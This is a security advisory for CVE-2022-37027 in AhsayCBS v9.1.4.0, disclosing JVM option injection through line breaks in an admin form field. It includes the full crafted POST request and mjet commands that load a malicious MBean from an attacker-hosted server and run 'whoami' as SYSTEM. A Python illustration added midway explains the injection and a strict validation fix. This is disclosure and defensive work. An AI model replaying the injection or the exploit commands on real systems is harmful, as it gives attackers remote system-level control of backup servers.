#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  AhsayCBS v9.1.4.0 for Windows
# Vendor:   Ahsay
# CSNC ID:  CSNC-2022-009
# CVE ID:   CVE-2022-37027
# Subject:  Authenticated Java Runtime Parameter Injection
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Jan Friedli
# Date:     14.09.2022
#
#############################################################

Introduction
------------
"Ahsay Cloud Backup Suite (AhsayCBS) is an advanced client-server based
on-premises and cloud backup software solution for Businesses and MSPs.
The whole solution can be deployed within a company to back up all
virtual machines, servers, desktops and laptops. MSPs can also use it
for offering secure managed backup service to their clients" [1].

Administrators (system users) who can modify the Runtime Options in the
web interface can inject additional JVM options: as the request below
shows, a runtime option value containing URL-encoded line breaks (%0D%0A)
followed by further "-D..." flags is accepted and carried over into the
JVM options. The injected options take effect after the next restart of
the server. This allows an authenticated administrator to enable an
unauthenticated JMX listener and achieve remote code execution as
NT AUTHORITY\SYSTEM.

Affected
--------
Vulnerable:     v9.1.4.0
Not vulnerable: v9.3.2.48

Technical Description
---------------------
As the system user, navigate to https://[HOST]/cbs/system/ShowAdvanced.do.
Click on "Save" and intercept the request, e.g., using Burp.
Alter the request parameter "editConfigBean.xss" so that its value
contains URL-encoded line breaks (%0D%0A) followed by the JVM options to
inject:

POST /cbs/system/ShowAdvanced.do HTTP/1.1
Host: localhost
Content-Length: 1069
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

editConfigBean.enableConfigRecovery=on&editConfigBean.autoSaveUseProxy=false&editConfigBean.proxyHost=&
editConfigBean.proxyPort=&editConfigBean.proxyUsername=system&editConfigBean.proxyPassword=system1&
editConfigBean.snmpPort=161&editConfigBean.snmpTrapRecv1.host=&editConfigBean.snmpTrapRecv1.trapPort=&
editConfigBean.snmpTrapRecv2.host=&editConfigBean.snmpTrapRecv2.trapPort=&
editConfigBean.snmpTrapRecv3.host=&editConfigBean.snmpTrapRecv3.trapPort=&
editConfigBean.community=&showSystemFileBean.currentHome=&
showSystemFileBean.currentDir=&showSystemFileBean.listDir=&showSystemFileBean.errMsg=&
showSystemFileBean.selectHome=true&showSystemFileBean.listSystemFiles.callTrigger=&
showSystemFileBean.listSystemFiles.rows%5B0%5D.id=0&showSystemFileBean.listSystemFiles.rows%5B1%5D.id=1&
showSystemFileBean.listSystemFiles.rows%5B2%5D.id=2&editConfigBean.xmx=2048&editConfigBean.xms=1024&
editConfigBean.xss=393216k%0D%0A-Dcom.sun.management.jmxremote%0D%0A-Dcom.sun.management.jmxremote.port%3D10010%0D%0A-Dcom.sun.management.jmxremote.rmi.port%3D10011%0D%0A-Dcom.sun.management.jmxremote.ssl%3Dfalse%0D%0A-Dcom.sun.management.jmxremote.authenticate%3Dfalse+%23&editConfigBean.xrs=true&editConfigBean.allowedIPOnServerTable.callTrigger=&editConfigBean.allowedIPOnServerTable.rows%5B0%5D.id=1220582084&callTrigger=RightBtn0

URL-decoded, the injected value of "editConfigBean.xss" is:

393216k
-Dcom.sun.management.jmxremote
-Dcom.sun.management.jmxremote.port=10010
-Dcom.sun.management.jmxremote.rmi.port=10011
-Dcom.sun.management.jmxremote.ssl=false
-Dcom.sun.management.jmxremote.authenticate=false #

The first line is the legitimate thread stack size; every following line
is an additional JVM option. After a restart of the server, JMX is
enabled on port 10010 without authentication or TLS.

Exploit JMX using https://github.com/mogwailabs/mjet:

$ java -jar jython-standalone-2.7.3b1.jar mjet.py 10.6.207.66 10010 install super_secret http://10.6.207.64:8000 8000
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Starting webserver at port 8000
[+] Using JMX RMI
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.6.207.66:10010/jmxrmi
[+] Connected: rmi://10.6.207.64 3
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://10.6.207.64:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
10.6.207.66 - - [22/Jul/2022 15:10:55] "GET / HTTP/1.1" 200 -
10.6.207.66 - - [22/Jul/2022 15:10:55] "GET /emmqpcve.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
[+] Changing default password...
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Successfully changed password
[+] Done

$ java -jar jython-standalone-2.7.3b1.jar mjet.py 10.6.207.66 10010 command super_secret "whoami"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Using JMX RMI
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.6.207.66:10010/jmxrmi
[+] Connected: rmi://10.6.207.64 4
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: whoami
nt authority\system
[+] Done

The command runs as NT AUTHORITY\SYSTEM, i.e. the attacker has a system
shell on the backup server.

Workaround / Fix
----------------
Install the latest version with the hotfix, v9.3.2.48.
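The following Python example is added here for illustration and is not part of the advisory or of Ahsay's code. It takes the "editConfigBean.xss" value from the request above (copied into the script as a constant), shows which lines the CRLF injection adds to the runtime options, flags the resulting unauthenticated JMX listener, and contrasts the unchecked handling with a strict size-only check of the kind such a field needs. The line-per-option rendering of the vulnerable path and the validation rule are assumptions about what the vulnerable and fixed code look like, not a description of the vendor's hotfix.

```python
import re
from typing import List
from urllib.parse import unquote_plus

# Constructed copy of the URL-encoded "editConfigBean.xss" value from the
# advisory's request (the only input this script uses).
INJECTED_XSS = (
    "393216k%0D%0A"
    "-Dcom.sun.management.jmxremote%0D%0A"
    "-Dcom.sun.management.jmxremote.port%3D10010%0D%0A"
    "-Dcom.sun.management.jmxremote.rmi.port%3D10011%0D%0A"
    "-Dcom.sun.management.jmxremote.ssl%3Dfalse%0D%0A"
    "-Dcom.sun.management.jmxremote.authenticate%3Dfalse+%23"
)

# A JVM memory size: digits with an optional k/m/g suffix (e.g. 393216k, 1024m).
SIZE_RE = re.compile(r"[1-9][0-9]*[kKmMgG]?")


def decode_xss(encoded: str) -> List[str]:
    """URL-decode the form value and split it on CR/LF; the first element is
    the value the form intended, the rest is whatever the CRLF injection added."""
    return unquote_plus(encoded).splitlines()


def render_options_unchecked(xmx: str, xms: str, xss: str) -> str:
    """Assumed shape of the vulnerable path: submitted values are written one
    JVM option per line without validation, so an xss value that already
    contains line breaks silently adds extra options."""
    return "\n".join([f"-Xmx{xmx}", f"-Xms{xms}", f"-Xss{xss}"])


def injected_options(encoded: str) -> List[str]:
    """Every line after the first is an attacker-controlled JVM option. The
    payload ends in ' #', so a trailing comment is stripped before comparing."""
    opts = []
    for line in decode_xss(encoded)[1:]:
        line = re.sub(r"\s*#.*$", "", line).strip()
        if line:
            opts.append(line)
    return opts


def jmx_unauthenticated(options: List[str]) -> bool:
    """True if the option set turns on the JMX remote agent with
    authentication explicitly disabled (the condition mjet relies on)."""
    opts = set(options)
    return ("-Dcom.sun.management.jmxremote" in opts
            and "-Dcom.sun.management.jmxremote.authenticate=false" in opts)


def validate_stack_size(encoded: str) -> str:
    """Hardened handling (an assumed fix, not the vendor's patch): accept only
    a bare memory size and reject any value with line breaks or extra tokens."""
    value = unquote_plus(encoded)
    if not SIZE_RE.fullmatch(value):
        raise ValueError(f"rejected runtime option value: {value!r}")
    return value


if __name__ == "__main__":
    rendered = render_options_unchecked("2048m", "1024m", unquote_plus(INJECTED_XSS))
    print("options written by the unchecked path:")
    print(rendered)
    extra = injected_options(INJECTED_XSS)
    print(f"\n{len(extra)} injected option(s); unauthenticated JMX:",
          jmx_unauthenticated(extra))
    try:
        validate_stack_size(INJECTED_XSS)
    except ValueError as err:
        print("strict check:", err)
    print("strict check accepts:", validate_stack_size("393216k"))
```

Run it as-is to see the three lines the form intended turn into eight JVM options; swap the constant for any other captured value of the field to check whether it would pass the strict size-only rule.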
Timeline
--------
2022-06-09: Discovery by Jan Friedli
2022-06-09: Initial contact
2022-06-27: Contacted again
2022-06-27: Contacted again
2022-08-12: Contacted multiple employees
2022-08-15: First successful contact exchange
2022-09-01: Requested status update (no response)
2022-09-06: Hotfix supplied

References
----------
[1] https://www.ahsay.com/jsp/en/products/ahsay-products_backup-software_overview.jsp